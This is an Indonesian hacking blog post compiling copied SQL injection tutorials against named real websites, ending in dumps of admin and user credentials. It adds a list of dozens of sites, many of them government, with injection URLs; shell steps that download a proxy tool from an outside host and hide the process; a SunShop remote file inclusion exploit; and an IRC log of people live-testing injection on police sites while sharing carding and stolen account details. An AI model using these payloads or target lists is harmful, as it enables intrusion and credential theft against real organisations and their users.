SQL 2

Written by Pendekar Thursday, 10 April 2008 Tags: depkominfo situs pemerintah go.id hacking deface kelemahan situs bugs website tutorial windows office word excel tips & trik tips vista hacking and deface cara deface download mp3 download software porn blocker memblokir situs porno download movie download film fitna tuts liveconnector bugs liveconnector hacking liveconnector profile

tutorial ini gw dapetin dari forum yang di posting sama temen gw...well dengan semangat berbagi :P for education purpose only yah.... here is the tuts..

SQL injection (PHP)

siapkan secangkir kopi dan sebungkus roko...klo bisa sebelah cewe...biar semangat!! yuks mulai aja ptama2 cari site yg mau di inject.

contoh: http://www.zaishu.com.au/shop.php?id=41

skarang tambahkan tanda - di blakang angka 41

http://www.zaishu.com.au/shop.php?id=41-

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1 keluar tulisan itu.. kemungkinan bisa di inject nih.. yuk mulai aja...

query pertama kita gunakan UNION SELECT

http://www.zaishu.com.au/shop.php?id=-41+union+select+1/**

nah disini kita mencari angka ajaib..kalo blom kluar terusin nomor setelah select http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2/**

terusin sampe kluar angka ajaibna ternyata sampe di angka 14 h

ttp://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/**

nah angka ajaib yg kluar 4,5 dan 11 angka2 inilah yg nanti digunakan.

nah setelah dapet kita cari version,user,database dengan memasukkan query ke angka ajaib tersebut * version() : current mysql version * database() : current database where user is connected * user() : connected to the database * system_user() : obvious * session_user() * current_user() * last_insert_id() * connection_id()

kali ini saya akan menggunakan angka 11

http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14/** nah ternyata version 5 sip deh..lanjut lagi... cek database dan nama usernya http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,database(),user(),6,7,8,9,10,version(),12,13,14/** karna angka ajaib ada 3,kita gunakan aja semua... hasilnya

zaishu_zaishu zaishu_user@localhost 5.0.45-community

skarang kita ngeluarin tablenya yang kita cari adalah table admin..ok? query yg kita gunakan adalah table_name from information_schema.tables where table_schema=database() limit 0,1/* ok langsung masukin aja.. http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/** nah ternyata keluar table address_book ok lanjut lagi... untuk ngeluarin table berikutnya tinggal di tambahin limitnya menjadi 1,1 2,1 dan seterusnya. kali ini kita akan mencari table admin.. ternyata sampai 2,1 kluar table admin dengan nama adminrights sekarang kita cari columnnya. query yg kita gunakan adalah column_name from information_schema.columns where table_name=’table_name’ limit 0,1/* nah table name yg kita cari tadi adalah adminrights kita rubah dlu menjadi bilangan hexa menjadi 0x61646d696e726967687473 jadi skarang tinggal kita masukkan. http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14+from+information_schema.columns+where+table_name=0x61646d696e726967687473+limit+0,1/* nah ternyata kluar column id selanjutnya kita tinggal tambahkan limitnya menjadi 1,1 2,1 dst akan kluar column username,password langkah selanjutnya tinggal kita kluarin datanya. kita akan menggunakan query concat() akan menjadi seperti ini

http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x2D2D,password),12,13,14+from+adminrights/** Ups,..ternyata kluar login dan password admin

PS: tanda + hanya sebagai pemisah bisa di ganti dengan spasi dan tanda 0x2D2D juga sebagai pemisah pada query concat.

Thank to aimar h4ntu nakkuta

saia mah cuman COPAS..

http://www.pssi-football.com/id/view_news_111082.php?id=-1616+union+select+1,2,3,4,concat(loginname,0x2D2D,password),6,7,8,9,10,11+from+pssi_football_member/*

SQL Injection di PHP Code

Yang harus lo siapin satu bungkus roko, cemilan dan alat pijit untuk tangan lo, kalo2 keseleo, kalo udah semua kita mulai.

http://www.theshiznit.co.uk/review.php?id=242 <<– ini target kita

Sekilas kalo dilihat tidak terjadi apa2 sekarang kita tambahkan tanda - sebelum 242

http://www.theshiznit.co.uk/review.php?id=-242

Maka pada area SCREESHOT dan artikelnya hilang, kemungkinan besar bisa di inject, tapi ingat g semuanya bisa.

Kita mulai injectnya dengan menggunakan UNION SELECT

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1/*

Kita harus memunculkan angka ajaib, jika belum muncul kita teruskan nomor setelah SELECT

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2/*

Ternyata di angka ke-2 belum juga muncul, lanjut lagi ampe tangan lo cantengan

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,5/*

Akhirnya muncul angka ajaibnya adalah 5

Sedikit kurang beruntung karena kita hanya mendapatkan satu angka, tapi gpp, itu lah asiknya

Setelah kita dapat angkanya kita cari vers, user, dan nama databasenya dengan memasukan perintah di bawah ini kedalam nomor yang muncul

* version() : current mysql version
* database() : current database where user is connected
* user() : connected to the database
* system_user() : obvious
* session_user()
* current_user()
* last_insert_id()
* connection_id()

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,version()/*

Ternyata versi 5, ok kita beruntung jika versi 4 kurang beruntung, kita lihat user dan databasenya

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,user()/* <<— sr0291893@81.31.99.13 nama usernya

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,database()/* <<— sr0291893 nama databasenya

Itu kalo kita hanya dapet satu nomor saja, jika mendapatkan 2 atau lebih nomor yg muncul kita bisa memasukan perntah kedalam nomor2 tersebut. Tapi g usah kuatir, ada trik tersendiri untuk memunculkan kesemuanya hanya dengan satu nomor, yaitu dengan perintah concat(), ok kita coba dengan perintah concat(version(),0×2D,database(),0×2D,user())

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,concat(version(),0×2D,database(),0×2D,user())/*

Ternyata bisa memuncul kan semua perintahnya 5.0.45-log-sr0291893-sr0291893@81.31.99.13

0×2D = - <<– ini hanya tanda untuk memisahkan saja

Sekarang kita cari tabelnya, ini bagian yg gue sukain, tp bikin pegel kalo tabelnya segambreng. Kita gunakan perintah table_name from information_schema.tables where table_schema=database() limit 0,1/*

Masukan table_name di nomor yang keluar, lalu masukan perintah from information_schema.tables where table_schema=database() limit 0,1/* setelah nomor terakhir

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1/*

Ternyata keluar tablenya dengan nama shiznit_comments

Untuk melihat tabel selanjutnya kita rubah limit+0,1 menjadi limit+1,1 trus limit+2,1 sampai tidak muncul table selanjutnya lagi. Di limit+7,1 kitamendapatkan table user dengan nama shiznit_users

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,table_name+from+information_schema.tables+where+table_schema=database()+limit+7,1/*

Sekarang kita cari columnnya dengan perintah column_name from information_schema.columns where table_name=’table_name’ limit 0,1/*

Cara pemasukannya sama dengan mencari table, dan untuk mencari column selanjutnya sama juga, dengan merubah limit 0,1 dengan limit 1,1 dst.

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,column_name+from+information_schema.columns+where+table_name=’shiznit_users’+limit+0,1/*

Ternyata muncul column id, kita cari lagi maka akan muncul md5id, created_on, email, password, nickname, first_name, last_name, location dan how_found. Wuih ada 10 column.

Sekarang kita keluarkan datanya, kita g perlu melihat semuanya, cukup intinya aja password dan nickname atau terserah lo, kalo mau lihat data yg lain. Karena kita hanya mendapatkan satu nomor ajaibnya, kita gunakan concat() saja, berlebih gampang, atau lo bisa memasukannya satu2 di nomor yg keluar atau nomor 5.

http://www.theshiznit.co.uk/review.php?id=-242+UNION+SELECT+1,2,3,4,concat(nickname,0×3a,password)+from+shiznit_users/*

Apakah yg muncul….ternyata muncul data nickname dan password member disana

Note:

tanda + hanya sebagai pemisah, lo juga bisa make spasi atau /**/

+ = spasi atau %20 = /**/

Terserah lo mau gaya apa, gaya kodok juga boleh

SQL Injection Memang Ampuh

Explorasi menggunakan SQL Injection
Dibawah ini beberapa web site yang diexplorasi dengan menggunakan SQL Injection :
http://www.amarullahfatimah.com/mod.php?mod=publisher&op=viewarticle&cid=1&artid=-126+union+select+1,2,version(),4,5,6,7,8,9,10/**
http://nusatenggaranews.com/mod.php?mod=publisher&op=viewarticle&cid=9&artid=3790+union+select+1/**
http://info.balitacerdas.com/mod.php?mod=publisher&op=viewarticle&artid=33+union+select+1/**
http://retailindo.info/mod.php?mod=diskusi&op=viewdisk&did=4+union+select+1/**
http://www.siwakz.net/mod.php?mod=publisher&op=viewarticle&cid=22&artid=58+union+select+1/**
http://www.tigapilar.org/mod.php?mod=publisher&op=viewarticle&cid=5&artid=762+union+select+1/**
http://www.arifhidayat.com/mod.php?mod=publisher&op=viewarticle&cid=1&artid=159+union+select+1/**
http://balitnak.litbang.deptan.go.id/mod.php?mod=publisher&op=viewarticle&artid=135+union+select+1/**
http://www.rakyatlampung.com/mod.php?mod=publisher&op=viewcat&cid=1+union+select+1/**
http://www.trubus-online.co.id/mod.php?mod=publisher&op=viewarticle&cid=12&artid=1141+union+select+1/**
http://www.silatindonesia.com/mod.php?mod=publisher&op=readarsip&year=2004&month=3+union+select+1/**
http://www.gayahidupsehatonline.com/mod.php?mod=publisher&op=viewarticle&cid=3&artid=235+union+select+1/**
http://www.agenpulsa.info/mod.php?mod=publisher&op=viewarticle&artid=68+union+select+1/**
http://www.onlinegoldmoney.com/mod.php?mod=iklanbaris&op=viewlink&cid=3+union+select+1/**
http://www.onlinegoldmoney.com/mod.php?mod=iklanbaris&op=viewlink&cid=3+union+select+1/**
http://www.langitlangit.com/mod.php?mod=-1+union+select+1/**
http://www.mirror.depsos.go.id/kfm/mod.php?mod=userpage&page_id=1+union+select+1/**
http://www.trubus-online.co.id/mod.php?mod=publisher&op=viewarticle&cid=1&artid=1166+union+select+1/**
http://www.cicurug.com/mod.php?mod=publisher&op=viewcat&cid=1+union+select+1/**
http://iklan.peluang-usaha.net/mod.php?mod=publisher&op=viewarticle&cid=9&artid=56+union+select+1/**
http://www.mesjidui.ui.edu/mod.php?mod=publisher&op=printarticle&artid=3+union+select+1/**
http://pfi3p.litbang.deptan.go.id/mod.php?mod=publisher&op=printarticle&artid=59+union+select+1/**
http://www.swarakita-manado.com/v2/mod.php?mod=publisher&op=viewarticle&cid=6&artid=20442+union+select+1/**
http://www.batamiklan.com/mod.php?mod=diskusi&op=viewcat&cid=9+union+select+1/**
http://www.onlinegoldmoney.com/mod.php?mod=iklanbaris&op=viewlink&cid=4+union+select+1/**
http://nusatenggaranews.com/mod.php?mod=publisher&op=viewarticle&cid=9&artid=2547+union+select+1/**
http://www.cicurug.com/mod.php?mod=publisher&op=viewcat&cid=5+union+select+1/**
http://www.totalfeedback.com/tfnew/mod.php?mod=publisher&op=printarticle&artid=2+union+select+1/**
http://www.bisnismalang.com/mod.php?mod=diskusi&op=printdisk&did=252+union+select+1/**
http://hipmisolo.com/mod.php?mod=katalog&op=viewlink&cid=24+union+select+1/**
http://www.merauke.go.id/mod.php?mod=publisher&op=viewcat&cid=-1+union+select+1/**
http://www.sentralweb.com/sentralweb/mod.php?mod=publisher&op=printarticle&artid=9+union+select+1/**
http://www.pesantrennet.org/mod.php?mod=-1+union+select+1/**
http://www.griyaanggraini.com/ga2007/mod.php?mod=-1+union+select+1/**
http://www.sidegg.com/mod.php?mod=-1+union+select+1/**
http://elink.dinkespurworejo.go.id/mod.php?mod=diskusi&op=printdisk&did=4+UNION+SELECT1+1/**
http://www.senirupa.net/mod.php?mod=publisher&op=printarticle&artid=123+UNION+SELECT1+1/**
http://pfi3p.litbang.deptan.go.id/mod.php?mod=publisher&op=printarticle&artid=55+UNION+SELECT1+1/**
http://www.propertynbank.com/mod.php?mod=publisher&op=printarticle&artid=45+UNION+SELECT1+1/**
http://tambangnews.com/mod.php?mod=publisher&op=printarticle&artid=969+UNION+SELECT1+1/**
http://www.bulutangkis.com/mod.php?mod=publisher&op=printarticle&artid=4552+UNION+SELECT1+1/**
http://www.warmasif.co.id/kesehatanonline/mod.php?mod=publisher&op=printarticle&artid=91+UNION+SELECT1+1/**
http://www.semarangcity.net/mod.php?mod=diskusi&op=printdisk&did=396+UNION+SELECT1+1/**
http://www.agrobisnis.net/mod.php?mod=diskusi&op=printdisk&did=5+UNION+SELECT1+1/**
http://www.smkn2sukawati.org/news/mod.php?mod=publisher&op=printarticle&artid=26+UNION+SELECT1+1/**
http://www.mimbar-opini.com/mod.php?mod=publisher&op=printarticle&artid=2571+UNION+SELECT1+1/**
http://www.lipia.org/mod.php?mod=download&op=viewcat&cid=3+UNION+SELECT1+1/**
http://www.denken.co.id/mod.php?mod=publisher&op=printarticle&artid=2+UNION+SELECT1+1/**
http://www.asmistmaria.ac.id/mod.php?mod=publisher&op=printarticle&artid=6+UNION+SELECT1+1/**
http://www.medaniklan.com/mod.php?mod=publisher&op=printarticle&artid=98+UNION+SELECT1+1/**
http://www.lcki.org/mod.php?mod=publisher&op=printarticle&artid=53+UNION+SELECT1+1/**
http://paroki-sragen.or.id/mod.php?mod=katalog&op=viewlink&cid=1+UNION+SELECT1+1/**

bikin peroksi

1. Pertama2 Siapkan shell anda....
2. wget http://jackzard.110mb.com/proxy.tgz
- mengambil proxy.tgz dengan perintah wget ataw menggunakan command lain
3. tar –zxvf proxy.tgz
- mengekstrak proxy.tgz
4. cd cd pro atw work in direktory masuk ke pro
- pindah ke folder pro
5../xh -s "/usr/sbin/httpd -DSSL"
- hide prosesnya
6. ./prox -a -d -p6969
- pilih port 6969
7. seting proxy dengan IP target tersebut, commang ifconfig atw kamu ping aja target trsbt
8. liat di cmyip.com ip2location.com dll..

Thanks to : Indoundergound

Sunshop 4 RFI

<@cah`cupu> Sunshop 4 RFI
[21:31] <@cah`cupu> sunshop 4 (index.php) Remote File Include Vulnerability
[21:31] <@cah`cupu> -----------------------------------------------------------------------------------------
[21:31] <@cah`cupu> # scripts : SunShop v4.0
[21:31] <@cah`cupu> # Discovered By : irvian
[21:31] <@cah`cupu> # scripts site : http://www.turnkeywebtools.com/sunshop/
[21:31] <@cah`cupu> # Thanks To : #hitamputih #nyubicrew #patihack
[21:31] * Joins: zhie_o (~gigi@125.162.53.102)
[21:31] <@cah`cupu> # special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
[21:31] <@cah`cupu> # dork : "powered by sunshop"
[21:32] <@cah`cupu> ------------------------------------------------------------------------------------------
[21:32] <@cah`cupu> bug found:
[21:32] <@cah`cupu> index.php
[21:32] <+aRiee> wew
[21:32] <@cah`cupu> $abs_path = dirname(__FILE__);
[21:32] <+demittegal> wkwkwkwkw
[21:32] <@cah`cupu> include $abs_path."/global.php";
[21:32] <@cah`cupu> checkout.php
[21:32] <@cah`cupu> $abs_path = dirname(__FILE__);
[21:32] <@cah`cupu> include $abs_path."/global.php";
[21:32] <+demittegal> hajarrrrrrrrrr
[21:32] <@cah`cupu> Exploit:
[21:32] <@cah`cupu> target.com/index.php?abs_path=[evilcode]
[21:32] <@cah`cupu> target.com/checkout.php?abs_path=[evilcode]

SQL TUTOR

<&home_edition2001> lo sekalian aja duduk disamping gw
<+dbzgts> tak berani ahhhh
<+dbzgts> kata roney mesti siapin pantat klo deket2 bius
<&home_edition2001> <[DEVIL_MAY_CRY]> www.bpkp.go.id/index.php?idunit=20&idpage=805 << ini bisa ga? << cek injek sql
<+dbzgts> wakakaka
<&home_edition2001> sialllllllllllllllll
<&home_edition2001> koneksi lag
<&home_edition2001> asu
<&home_edition2001> la
<+[DEVIL_MAY_CRY]> Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/eby/2007/index.php on line 98
<+[DEVIL_MAY_CRY]> PENCARIAN
<+[DEVIL_MAY_CRY]> Kata kunci :
<+[DEVIL_MAY_CRY]> Kategor
<+dbzgts> kaboerrrrrrrrrrr
<+[DEVIL_MAY_CRY]> tuh kaya gitu bisa ga?
* +XhuRtzX (desperate@staff.bandung.solpotcrew.info) Quit (Quit from MILDNet: ye)
<+[DEVIL_MAY_CRY]> pake ' apa having 1=1 ?
<&home_edition2001> http://www.bpkp.go.id/index.php?idunit=20&idpage=805 and 1=0 << tetsting nya klo erorr berarti bisa di injek
<&home_edition2001> http://www.bpkp.go.id/index.php?idunit=20&idpage=805 and 1=1 < klo normal lagi berarti 100 % berbug sql
<&home_edition2001> klo php
<&home_edition2001> xix
<&home_edition2001> lo bayangin aja
<&home_edition2001> beli ama orang tuli sama gagu
<&home_edition2001> xixi
<&home_edition2001> cuman isa geleng2 sama manggut2
<&home_edition2001> nah sql php seperti itu
<+[DEVIL_MAY_CRY]> kaga error bius
<+[DEVIL_MAY_CRY]> cari yg laen ya
<+dbzgts> gue mo berguru ma bius ahh
<&home_edition2001> wew
<&home_edition2001> iya gak isa
<&home_edition2001> xixi
<+dbzgts> mo sogok pake code camfrog dulu
<+coayaoo> om bius
<&home_edition2001> cari yang lain
<+coayaoo> gimana klo cc ngga valid bisa jadi valid
<+coayaoo> gimana caranya
<&home_edition2001> site polri aja
<+baghostito> wew bius bisa ngajarin?? ;))
<&home_edition2001> http://www.bali.polri.go.id/agenda_details.php
<&home_edition2001> ini aja
<&home_edition2001> supaya ada tantangannya
<+[DEVIL_MAY_CRY]> ok
<+coayaoo> gimana
<+coayaoo> cara cc decline bisa jadi valid
<+[DEVIL_MAY_CRY]> http://www.bali.polri.go.id/agenda_details.php <<
variabelnya mana?
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php
* +ENGINEBOY (ENGINEBOY@Mild-C7DECCA9.rmts.satcom-systems.net) Quit (Ping timeout)
<&home_edition2001> ini juga bisa
<+[DEVIL_MAY_CRY]> Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in /var/www/html/aplib/phpMysqlConnection.php on line 313
<@live> MILDnet Info : DONATE Support MILDnet Network by donate your e-gold account to http://4222642.e-gold.com/ we appreciate all donation that you make, thank you
<&home_edition2001> Senen - Cempaka Putih Ramai Cenderung Padat
<&home_edition2001> 2008-01-29 19:53:53
<&home_edition2001> Situasi arus lalu lintas dari arah Jl Imam Bonjol dan Jl. Diponegoro sampai saat ini masih terpantau...
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228
<&home_edition2001> tu target
<+[DEVIL_MAY_CRY]> ok
<+brew0ks> wew
<&home_edition2001> itu aja ya
<+brew0ks> kok polisi
<&home_edition2001> gpp la
<+brew0ks> jgn
<&home_edition2001> biar ada tantangnnya
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 and 1=0
<&home_edition2001> tes
<+coayaoo> jangang lah
<+brew0ks> ntar sulit lu
* ENGINEBOY (ENGINEBOY@Mild-C7DECCA9.rmts.satcom-systems.net) has joined #nyubicrew
<+[DEVIL_MAY_CRY]> Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 23 in /home/pub/webbaru/_includes/metabase_mysql.php on line 162
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20and%201=0
<&home_edition2001> xix
<&home_edition2001> mantab
<+[DEVIL_MAY_CRY]> dah error tu
<&home_edition2001> kena bug tu
<&home_edition2001> xix
<&home_edition2001> coba balikna ke satu lagi
<+[DEVIL_MAY_CRY]> ok
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20and%201=1 << balik lagi
<+kangkung> http://www.lantas.metro.polri.go.id/news/index.php?id=
<&home_edition2001> awawaw
<+brew0ks> ampun dah gw
<+[DEVIL_MAY_CRY]> yup jadi ga errror
<+brew0ks> sama bius
<&home_edition2001> xi
<&home_edition2001> itu artinya
<&home_edition2001> xixi
* live sets mode: +v ENGINEBOY
<&home_edition2001> kita membuat false suatu nilai
<&home_edition2001> xixix
<&home_edition2001> namanya apa magic apa se
<+[DEVIL_MAY_CRY]> trus ngeluarin tabel pertama cemana?
<&home_edition2001> lupa
<&home_edition2001> magic question ya
<&home_edition2001> lupa
<&home_edition2001> wew
<+[DEVIL_MAY_CRY]> magic quote
<&home_edition2001> sabar la
<+brew0ks> Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 23 in /home/pub/webbaru/_includes/metabase_mysql.php on line 162
<&home_edition2001> iya magiq quot
<+brew0ks> :P
<&home_edition2001> wekekek
<&home_edition2001> trus langkah pertama
<+[DEVIL_MAY_CRY]> lanjuttt
<&home_edition2001> kita pake union
<&home_edition2001> xixix
<+brew0ks> lanjot
<+[DEVIL_MAY_CRY]> ok
<&home_edition2001> dengan union perintah menjadi false
<&home_edition2001> xixi
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 and 1=0 sama dengan http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select --
<&home_edition2001> xixi
* +log (log@www.rhe.name) has left #nyubicrew (No regret for inviter!)
* log (log@www.rhe.name) has joined #nyubicrew
<&home_edition2001> gimana supaya ntar jadi http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 and 1=1
<+brew0ks> we mantabs
<+brew0ks> INVALID QUERY !
<+[DEVIL_MAY_CRY]> query nya salah ya
<+[DEVIL_MAY_CRY]> hehehe
<+brew0ks> :(
<+[DEVIL_MAY_CRY]> supaya benar diapain bius?
* live sets mode: +v log
<+[DEVIL_MAY_CRY]> pa guru nya lama ni..xixixi
<+[DEVIL_MAY_CRY]> murid dah ga sabar
<+dbzgts> pa guru lag
<&home_edition2001> wew
<&home_edition2001> biasa lah tambah angka2
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0--
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0,1--
<+coayaoo> trus gimana pak guru bius
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0,1,1--
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228 union select 0,1,1,1--
<&home_edition2001> sampe bernilai benar
<&home_edition2001> weeke
<&home_edition2001> coba sana
<+super2> keren euy
<+[DEVIL_MAY_CRY]> oow..coba ya
<+coayaoo> bius
<+super2> yang dicoba polri :))
<&home_edition2001> udah ngerti lom logikanya
<+coayaoo> klo mo dapat target shopadmin gimana pak bius
<&home_edition2001> wew
<&home_edition2001> cri yang homenya ada cart
<&home_edition2001> or $$$nya
<&home_edition2001> dijamin shop
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20union%20select%200,1,1,1,1,1,1,1,1,1--
<&home_edition2001> maknyus
<&home_edition2001> wekkeke
<&home_edition2001> artikenya muncul lagi
<&home_edition2001> wekekek
<&home_edition2001> swet
<&home_edition2001> gimana [DEVIL_MAY_CRY]
<&home_edition2001> kok duluan gw
* Guest17087 is now known as aanK
<&home_edition2001> padahal gw pake hp
* Help sets mode: +ao aanK aanK
<+[DEVIL_MAY_CRY]> iye sial..xixixi
<+[DEVIL_MAY_CRY]> ya udah lanjut
<&home_edition2001> lanjut aap
<&home_edition2001> xixix
<+[DEVIL_MAY_CRY]> kan udah bener tuh
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20union%20select%200,1,1,1,1,1,1,1,1,1-- << nilai true buat suatu union
<&home_edition2001> xixix
<&home_edition2001> beda script beda angkanya
<&home_edition2001> bisa panjang
<&home_edition2001> bisa pendek
<+[DEVIL_MAY_CRY]> wew
<&home_edition2001> xixix
<+dbzgts> liat column table gimana bius
<+[DEVIL_MAY_CRY]> ini dia intinya
<&home_edition2001> makanya dites satu2
<+dbzgts> gmana kita bisa tau
<&home_edition2001> wew
* _chilu_ (Metalinggu@chilu.keren.cool.a.biz) has joined #nyubicrew
<&home_edition2001> sabar la
<+dbzgts> jajajaja
<&home_edition2001> wew
<&home_edition2001> klo versi 4 gak isa
<+[DEVIL_MAY_CRY]> coba perlahan2
<&home_edition2001> klo versi 5 isa
<&home_edition2001> xixix
<&home_edition2001> untung2an
<&home_edition2001> la
<&home_edition2001> xixix
<@live> MILDnet Info : DONATE Support MILDnet Network by donate your e-gold account to http://4222642.e-gold.com/ we appreciate all donation that you make, thank you
<&home_edition2001> karena versi 5 ada information.schmeme
<&home_edition2001> versi 4 lom ada
<&home_edition2001> xixix
* &aanK (admin@Abuse.Vhost.Committee.MILDnet.Org) has left #nyubicrew
* aanK (admin@Abuse.Vhost.Committee.MILDnet.Org) has joined #nyubicrew
<&Help> [aanK] [[[[[[[[ SIGANTENG FROM IRC.MILDNET.ORG ]]]]]]]]
* Help sets mode: +ao aanK aanK
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=12228%20union%20select%200,1,1,1,1,1,1,1,1,1-- << udah nilai true
<&home_edition2001> kita buat false lagi
* live sets mode: +v _chilu_
<&home_edition2001> dengan nambahin -
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,1,1,1,1,1,1,1,1,1-- << udah nilai true
<&home_edition2001> untuk jalanin query sql
<&aanK> hmm.. ikuttan belajar gw ya biusss
<&home_edition2001> gak leh
<&home_edition2001> xixi
<&home_edition2001> apa hasilnya [DEVIL_MAY_CRY]
* +ShA^_^rY (meiliza@40A714FC.6194A399.1002205F.IP) Quit (Connection reset by peer)
<&home_edition2001> keknya lag bgt lo
* asLpLs (rasta@B0B03994.52A3B7FC.8DFA7C87.IP) has joined #nyubicrew
<&aanK> biuss bagi egold lah ,,
* &home_edition2001 slaps asLpLs around a bit with a large trout
<&aanK> kau kan dapat egold dari si raindayz kemaren
<+[DEVIL_MAY_CRY]> muncul angka 1
<&aanK> kwkwkwkwkw
<&aanK> iyes muncul angka 1
<&home_edition2001> wew
<&home_edition2001> iya
<&home_edition2001> xixi
<&home_edition2001> kita gak tai 1 itu 1 yang mana
<&aanK> $2 pls
<&home_edition2001> makanya kita ganti angka2
<&home_edition2001> jadi berurutan
<&home_edition2001> xixi
<+[DEVIL_MAY_CRY]> ok kaya gimana?
<&home_edition2001> biar tau 1 yang bisa dimunculin 1 yang mana
<&aanK> NVALID QUERY !
* live sets mode: +v asLpLs
<+coayaoo> 208029201000004152
<+coayaoo> Subscription Purchased $17.95(USD) for 30 days then
<+coayaoo> Subscription Purchased $17.95(USD) for 30 days then $17.95(USD) recurring every 30 days
<+coayaoo> Site URL http://www.videobox.com/login.jtp
<+coayaoo> Username sunarji Password
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,1,2,3,4,5,6,7,8,9--
<+[DEVIL_MAY_CRY]> lgi bljara dolo ni
<&home_edition2001> 3
<&home_edition2001> --1
<&home_edition2001> 5
<&home_edition2001> wekeke
<+baghostito> wew senangnya akhirnya bisa jg :D
<+baghostito> Thank you for your purchase, you have been approved!
<+baghostito> To access your new membership click the site URL link below
<&aanK> ada angkar 1 3 ma 5
<&home_edition2001> angka2 itu yang bisa di jadikan keluaran buat query sql
* pengemis (he@pengemis.users.mildnet.org) has joined #nyubicrew
<&aanK> itu artinye apaan bius
<+[DEVIL_MAY_CRY]> yup
<+[DEVIL_MAY_CRY]> 1 3 ama 5
<&home_edition2001> itu hasil dari union yang bisa kita ganti dengan qyery sql
<&home_edition2001> xixi
<&home_edition2001> contoh yang bisa di jalankan langsung
<&aanK> terus selanjutnya
<&home_edition2001> version()
<&home_edition2001> user()
* fax (ooo@Mild-9A4ECC68.multilinks.com) has joined #nyubicrew
* meett33jay (meett33jay@9265D089.362D78A1.748CC7F.IP) has joined #nyubicrew
<+dbzgts> situs nya jadi lag...byk yg access
<&home_edition2001> database()
<+coayaoo> home
<&home_edition2001> kita liat versinya berapa
* ganteng.mildnet.org sets mode: +i
<&home_edition2001> klo 5 bantaii
<+coayaoo> klo mo cari target
<+coayaoo> sekarang apa
<+coayaoo> key word nya apa
* live sets mode: +v pengemis
<&aanK> terus cemana ?
<&home_edition2001> klo 4 nebak2 yang tadi gw bilang menghadapi pedagang budek dan gagu
<&home_edition2001> cuman isa manggut2 sama geleng2
* +pengemis (he@pengemis.users.mildnet.org) has left #nyubicrew
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,1,2,version(),4,5,6,7,8,9--
<+[DEVIL_MAY_CRY]> or 1=convert(int,(@@VERSION))-- << ke gini bisa ga?
* live sets mode: +v fax
<&home_edition2001> 5.0.24a-Debian_9-log
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,user(),2,version(),4,database(),6,7,8,9--
<&home_edition2001> 5.0.24a-Debian_9-log
<&home_edition2001> --root@localhost
<&home_edition2001> polisi
<&home_edition2001> wekeke
* live sets mode: +v meett33jay
<&home_edition2001> <&home_edition2001> --root@localhost << user
<&home_edition2001> <&home_edition2001> polisi << databasenya
<&home_edition2001> lanjut
<&home_edition2001> kita keluarkan semua tabel + kolom2nya
<&home_edition2001> wekekke
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<&home_edition2001> mana ne si [DEVIL_MAY_CRY]
<+[DEVIL_MAY_CRY]> iya
<+[DEVIL_MAY_CRY]> ayo di concat..xixixi
<&home_edition2001> information_schema.columns << ni fasilitas versi 5 mysql yang kita hajar
<+dbzgts> mantabbbbb
<&home_edition2001> xixi
